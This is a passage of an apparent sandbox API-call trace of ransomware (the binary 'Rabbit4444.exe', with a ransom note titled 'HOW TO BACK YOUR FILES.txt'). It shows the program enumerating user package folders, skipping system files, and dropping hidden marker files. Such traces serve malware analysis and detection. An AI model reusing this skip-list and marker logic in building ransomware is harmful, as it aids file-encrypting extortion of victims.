(lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2=".") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="..") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.880] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.XboxGameCallableUI_cw5n1h2txyewy" | out: lpString1="Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned="Microsoft.XboxGameCallableUI_cw5n1h2txyewy" [0055.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0055.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118e98 [0055.880] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122108 [0055.880] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x936165c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x936165c3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", cAlternateFileName="MIF834~1.XBO")) returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.881] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.XboxGameOverlay_8wekyb3d8bbwe" | out: lpString1="Microsoft.XboxGameOverlay_8wekyb3d8bbwe") returned="Microsoft.XboxGameOverlay_8wekyb3d8bbwe" [0055.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0055.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x11e2c0 [0055.881] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x121fa8 [0055.881] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf22e0430, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf22e0430, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.XBO")) returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.881] lstrcmpiW (lpString1="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.881] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe" | out: lpString1="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe") returned="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe" [0055.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x119208 [0055.882] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x122068 [0055.882] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.XBO")) returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.882] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe" | out: lpString1="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe") returned="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe" [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x11e368 [0055.882] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x121fc8 [0055.882] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x913b2022, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.ZuneMusic_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ZUN")) returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneMusic_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneMusic_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneMusic_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.882] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.ZuneMusic_8wekyb3d8bbwe" | out: lpString1="Microsoft.ZuneMusic_8wekyb3d8bbwe") returned="Microsoft.ZuneMusic_8wekyb3d8bbwe" [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x1132d8 [0055.882] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122348 [0055.882] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8f25108d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.ZuneVideo_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.ZUN")) returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneVideo_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneVideo_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.882] lstrcmpiW (lpString1="Microsoft.ZuneVideo_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.882] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.ZuneVideo_8wekyb3d8bbwe" | out: lpString1="Microsoft.ZuneVideo_8wekyb3d8bbwe") returned="Microsoft.ZuneVideo_8wekyb3d8bbwe" [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113eb8 [0055.882] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122008 [0055.882] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x789ce851, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows.ContactSupport_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.CON")) returned 1 [0055.882] lstrcmpiW (lpString1="Windows.ContactSupport_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.882] lstrcmpiW (lpString1="Windows.ContactSupport_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.882] lstrcmpiW (lpString1="Windows.ContactSupport_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned 1 [0055.882] lstrcpyW (in: lpString1=0x130eb86, lpString2="Windows.ContactSupport_cw5n1h2txyewy" | out: lpString1="Windows.ContactSupport_cw5n1h2txyewy") returned="Windows.ContactSupport_cw5n1h2txyewy" [0055.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113a58 [0055.883] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122368 [0055.883] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb3df96, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a8cfa4e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a8cfa4e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windows.devicesflow_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.DEV")) returned 1 [0055.883] lstrcmpiW (lpString1="windows.devicesflow_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.883] lstrcmpiW (lpString1="windows.devicesflow_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.883] lstrcmpiW (lpString1="windows.devicesflow_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned 1 [0055.883] lstrcpyW (in: lpString1=0x130eb86, lpString2="windows.devicesflow_cw5n1h2txyewy" | out: lpString1="windows.devicesflow_cw5n1h2txyewy") returned="windows.devicesflow_cw5n1h2txyewy" [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113698 [0055.883] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x1220a8 [0055.883] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b315bfa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd8832b29, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windows.immersivecontrolpanel_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.IMM")) returned 1 [0055.883] lstrcmpiW (lpString1="windows.immersivecontrolpanel_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.883] lstrcmpiW (lpString1="windows.immersivecontrolpanel_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.883] lstrcmpiW (lpString1="windows.immersivecontrolpanel_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned 1 [0055.883] lstrcpyW (in: lpString1=0x130eb86, lpString2="windows.immersivecontrolpanel_cw5n1h2txyewy" | out: lpString1="windows.immersivecontrolpanel_cw5n1h2txyewy") returned="windows.immersivecontrolpanel_cw5n1h2txyewy" [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x117e18 [0055.883] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122248 [0055.883] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x77c3f1ef, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows.MiracastView_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.MIR")) returned 1 [0055.883] lstrcmpiW (lpString1="Windows.MiracastView_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.883] lstrcmpiW (lpString1="Windows.MiracastView_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.883] lstrcmpiW (lpString1="Windows.MiracastView_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned 1 [0055.883] lstrcpyW (in: lpString1=0x130eb86, lpString2="Windows.MiracastView_cw5n1h2txyewy" | out: lpString1="Windows.MiracastView_cw5n1h2txyewy") returned="Windows.MiracastView_cw5n1h2txyewy" [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113f58 [0055.883] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x121fe8 [0055.883] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x715dffc9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows.PrintDialog_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.PRI")) returned 1 [0055.883] lstrcmpiW (lpString1="Windows.PrintDialog_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.883] lstrcmpiW (lpString1="Windows.PrintDialog_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.883] lstrcmpiW (lpString1="Windows.PrintDialog_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned 1 [0055.883] lstrcpyW (in: lpString1=0x130eb86, lpString2="Windows.PrintDialog_cw5n1h2txyewy" | out: lpString1="Windows.PrintDialog_cw5n1h2txyewy") returned="Windows.PrintDialog_cw5n1h2txyewy" [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0055.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113378 [0055.884] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122328 [0055.884] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3af37fe8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 1 [0055.884] lstrcmpiW (lpString1="windows_ie_ac_001", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.884] lstrcmpiW (lpString1="windows_ie_ac_001", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.884] lstrcmpiW (lpString1="windows_ie_ac_001", lpString2="Rabbit4444.exe") returned 1 [0055.884] lstrcpyW (in: lpString1=0x130eb86, lpString2="windows_ie_ac_001" | out: lpString1="windows_ie_ac_001") returned="windows_ie_ac_001" [0055.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0055.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10ec68 [0055.884] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220c8 [0055.884] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3af37fe8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 0 [0055.884] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0055.884] lstrcpyW (in: lpString1=0x130eb86, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.884] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.884] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.886] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.886] CloseHandle (hObject=0x278) returned 1 [0055.886] CloseHandle (hObject=0x27c) returned 1 [0055.886] GetCurrentThreadId () returned 0xd98 [0055.886] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0055.886] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001" [0055.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ec68 | out: hHeap=0xe0000) returned 1 [0055.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0055.886] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001" [0055.886] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\" [0055.886] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\.BFC0E91B00AE8A0620D3" [0055.886] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.887] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.890] FlushFileBuffers (hFile=0x27c) returned 1 [0055.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.891] CloseHandle (hObject=0x27c) returned 1 [0055.891] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001") returned 56 [0055.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.892] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaa2bf81, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0055.892] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.892] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.892] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.892] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.892] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaa2bf81, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.892] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.892] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.892] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.892] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.892] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.892] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa2bf81, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa2bf81, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa2bf81, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, 